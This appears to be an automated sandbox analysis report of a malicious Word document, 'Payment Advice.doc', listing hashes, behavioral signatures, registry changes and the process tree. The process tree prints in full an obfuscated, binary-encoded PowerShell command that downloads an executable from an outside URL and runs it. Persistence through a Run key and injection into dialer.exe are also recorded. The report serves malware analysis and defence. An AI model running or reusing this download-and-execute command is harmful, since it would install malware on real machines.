Analysis
-
max time kernel
289s -
max time network
291s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
15-07-2021 20:14
Static task
static1
Behavioral task
behavioral1
Sample
Payment Advice.doc
Resource
win7v20210408
Behavioral task
behavioral2
Sample
Payment Advice.doc
Resource
win10v20210410
General
-
Target
Payment Advice.doc
-
Size
217KB
-
MD5
a1bb900ae8003b924f333442c4117a84
-
SHA1
126cd9e2de926ade2cdb20fb8d2a059b7786fde6
-
SHA256
9c5912424f920b71a98b0ac032cb3e74ca830dd0c9e9e2d406f4b9ff1f53af80
-
SHA512
c7dbbc07793a59b038f5376b345aeb9c967f339b36e9242043207a66bc27a6b3046f7d143a61d48ae4ef9423efcff6919d30cfb86e736f16aa74dcf81c812f5e
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 564 1820 powershell.exe WINWORD.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 7 564 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
winint.exepid process 296 winint.exe -
Loads dropped DLL 2 IoCs
Processes:
powershell.exepid process 564 powershell.exe 564 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
winint.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Kajscxo = "C:\\Users\\Public\\Libraries\\oxcsjaK.url" winint.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1540 300 WerFault.exe dialer.exe -
Office loads VBA resources, possible macro or embedded object present
-
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1820 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exeWerFault.exepid process 564 powershell.exe 564 powershell.exe 1540 WerFault.exe 1540 WerFault.exe 1540 WerFault.exe 1540 WerFault.exe 1540 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeWerFault.exedescription pid process Token: SeDebugPrivilege 564 powershell.exe Token: SeDebugPrivilege 1540 WerFault.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXEpid process 1820 WINWORD.EXE 1820 WINWORD.EXE 1820 WINWORD.EXE -
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
WINWORD.EXEpowershell.exewinint.exedialer.exedescription pid process target process PID 1820 wrote to memory of 564 1820 WINWORD.EXE powershell.exe PID 1820 wrote to memory of 564 1820 WINWORD.EXE powershell.exe PID 1820 wrote to memory of 564 1820 WINWORD.EXE powershell.exe PID 1820 wrote to memory of 564 1820 WINWORD.EXE powershell.exe PID 564 wrote to memory of 296 564 powershell.exe winint.exe PID 564 wrote to memory of 296 564 powershell.exe winint.exe PID 564 wrote to memory of 296 564 powershell.exe winint.exe PID 564 wrote to memory of 296 564 powershell.exe winint.exe PID 296 wrote to memory of 300 296 winint.exe dialer.exe PID 296 wrote to memory of 300 296 winint.exe dialer.exe PID 296 wrote to memory of 300 296 winint.exe dialer.exe PID 296 wrote to memory of 300 296 winint.exe dialer.exe PID 296 wrote to memory of 300 296 winint.exe dialer.exe PID 296 wrote to memory of 300 296 winint.exe dialer.exe PID 296 wrote to memory of 300 296 winint.exe dialer.exe PID 296 wrote to memory of 300 296 winint.exe dialer.exe PID 296 wrote to memory of 300 296 winint.exe dialer.exe PID 296 wrote to memory of 300 296 winint.exe dialer.exe PID 296 wrote to memory of 300 296 winint.exe dialer.exe PID 296 wrote to memory of 300 296 winint.exe dialer.exe PID 296 wrote to memory of 300 296 winint.exe dialer.exe PID 296 wrote to memory of 300 296 winint.exe dialer.exe PID 296 wrote to memory of 300 296 winint.exe dialer.exe PID 296 wrote to memory of 300 296 winint.exe dialer.exe PID 300 wrote to memory of 1540 300 dialer.exe WerFault.exe PID 300 wrote to memory of 1540 300 dialer.exe WerFault.exe PID 300 wrote to memory of 1540 300 dialer.exe WerFault.exe PID 300 wrote to memory of 1540 300 dialer.exe WerFault.exe PID 1820 wrote to memory of 1380 1820 WINWORD.EXE splwow64.exe PID 1820 wrote to memory of 1380 1820 WINWORD.EXE splwow64.exe PID 1820 wrote to memory of 1380 1820 WINWORD.EXE splwow64.exe PID 1820 wrote to memory of 1380 1820 WINWORD.EXE splwow64.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Payment Advice.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v78df0=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,01110011,00111010,00101111,00101111,01100011,01100100,01101110,00101110,01100100,01101001,01110011,01100011,01101111,01110010,01100100,01100001,01110000,01110000,00101110,01100011,01101111,01101101,00101111,01100001,01110100,01110100,01100001,01100011,01101000,01101101,01100101,01101110,01110100,01110011,00101111,00111000,00110101,00110110,00111001,00110010,00110101,00111001,00110101,00110010,00110000,00110000,00110100,00110000,00110110,00110011,00110010,00110100,00110010,00101111,00111000,00110110,00110101,00110010,00110111,00110100,00110010,00110000,00110010,00110011,00110111,00111000,00110110,00110000,00110000,00110100,00110100,00111001,00101111,01010011,01100101,01100011,01110101,01110010,01100101,01000101,01000110,01010100,01001110,01101111,01110100,01101001,01100011,01100101,00101110,01100101,01111000,01100101,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01110111,01101001,01101110,01101001,01101110,01110100,00101110,01100101,01111000,01100101,00100111,00100111,00101001,00100111,00111011,00100100,01010100,01000011,00111101,01001001,01000101,01011000,00100000,00101000,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,00101001,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01110111,01101001,01101110,01101001,01101110,01110100,00101110,01100101,01111000,01100101,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $v78df0)|IEX2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\winint.exe"C:\Users\Admin\AppData\Local\Temp\winint.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\dialer.exeC:\Windows\System32\dialer.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 300 -s 1485⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\winint.exeMD5
36f250cb265a9ea1e50697c0def52aa8
SHA1ab1b5c8c68b77b4ab53cfed9ee5f2c192a29f5a3
SHA256eb92966bcd8187376efd77e3ce4d830b8ae81de436f23a604c218beac3554514
SHA512ef70fa852f3a4abc6bae263fb423be14e246739814471d7ddbcc588e30f5345910490a49f2a396e4da24c70427d103934a4502e7dea9dec9dc370d8315bc9c56
-
C:\Users\Admin\AppData\Local\Temp\winint.exeMD5
36f250cb265a9ea1e50697c0def52aa8
SHA1ab1b5c8c68b77b4ab53cfed9ee5f2c192a29f5a3
SHA256eb92966bcd8187376efd77e3ce4d830b8ae81de436f23a604c218beac3554514
SHA512ef70fa852f3a4abc6bae263fb423be14e246739814471d7ddbcc588e30f5345910490a49f2a396e4da24c70427d103934a4502e7dea9dec9dc370d8315bc9c56
-
\Users\Admin\AppData\Local\Temp\winint.exeMD5
36f250cb265a9ea1e50697c0def52aa8
SHA1ab1b5c8c68b77b4ab53cfed9ee5f2c192a29f5a3
SHA256eb92966bcd8187376efd77e3ce4d830b8ae81de436f23a604c218beac3554514
SHA512ef70fa852f3a4abc6bae263fb423be14e246739814471d7ddbcc588e30f5345910490a49f2a396e4da24c70427d103934a4502e7dea9dec9dc370d8315bc9c56
-
\Users\Admin\AppData\Local\Temp\winint.exeMD5
36f250cb265a9ea1e50697c0def52aa8
SHA1ab1b5c8c68b77b4ab53cfed9ee5f2c192a29f5a3
SHA256eb92966bcd8187376efd77e3ce4d830b8ae81de436f23a604c218beac3554514
SHA512ef70fa852f3a4abc6bae263fb423be14e246739814471d7ddbcc588e30f5345910490a49f2a396e4da24c70427d103934a4502e7dea9dec9dc370d8315bc9c56
-
memory/296-94-0x0000000000220000-0x0000000000221000-memory.dmpFilesize
4KB
-
memory/296-91-0x0000000000000000-mapping.dmp
-
memory/300-103-0x0000000000150000-0x0000000000151000-memory.dmpFilesize
4KB
-
memory/300-104-0x0000000010590000-0x000000001060D000-memory.dmpFilesize
500KB
-
memory/300-101-0x0000000000080000-0x0000000000081000-memory.dmpFilesize
4KB
-
memory/300-102-0x0000000000100000-0x0000000000101000-memory.dmpFilesize
4KB
-
memory/300-97-0x0000000000000000-mapping.dmp
-
memory/564-88-0x00000000066F0000-0x00000000066F1000-memory.dmpFilesize
4KB
-
memory/564-66-0x00000000047C0000-0x00000000047C1000-memory.dmpFilesize
4KB
-
memory/564-79-0x000000007EF30000-0x000000007EF31000-memory.dmpFilesize
4KB
-
memory/564-80-0x0000000006460000-0x0000000006461000-memory.dmpFilesize
4KB
-
memory/564-87-0x0000000006300000-0x0000000006301000-memory.dmpFilesize
4KB
-
memory/564-63-0x0000000000000000-mapping.dmp
-
memory/564-73-0x0000000005730000-0x0000000005731000-memory.dmpFilesize
4KB
-
memory/564-70-0x0000000005240000-0x0000000005241000-memory.dmpFilesize
4KB
-
memory/564-69-0x0000000004750000-0x0000000004751000-memory.dmpFilesize
4KB
-
memory/564-68-0x0000000000A32000-0x0000000000A33000-memory.dmpFilesize
4KB
-
memory/564-67-0x0000000000A30000-0x0000000000A31000-memory.dmpFilesize
4KB
-
memory/564-78-0x0000000006180000-0x0000000006181000-memory.dmpFilesize
4KB
-
memory/564-65-0x0000000000B40000-0x0000000000B41000-memory.dmpFilesize
4KB
-
memory/1380-106-0x0000000000000000-mapping.dmp
-
memory/1380-107-0x000007FEFBED1000-0x000007FEFBED3000-memory.dmpFilesize
8KB
-
memory/1540-99-0x0000000000000000-mapping.dmp
-
memory/1540-105-0x0000000002300000-0x0000000002301000-memory.dmpFilesize
4KB
-
memory/1820-59-0x00000000729D1000-0x00000000729D4000-memory.dmpFilesize
12KB
-
memory/1820-62-0x0000000076641000-0x0000000076643000-memory.dmpFilesize
8KB
-
memory/1820-61-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1820-60-0x0000000070451000-0x0000000070453000-memory.dmpFilesize
8KB